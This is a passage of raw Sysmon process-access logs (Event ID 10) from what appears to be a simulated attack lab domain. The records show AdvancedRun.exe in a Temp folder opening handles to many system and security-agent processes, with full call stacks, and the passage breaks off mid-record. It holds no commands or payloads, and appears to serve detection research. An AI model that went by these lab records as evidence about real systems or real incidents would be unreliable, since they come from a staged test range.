18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004015442Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004015441Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004015440Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004015439Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004015438Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004015437Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004015436Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015435Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015434Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000004015433Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015432Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015431Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015430Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015429Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015428Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015427Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015426Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program 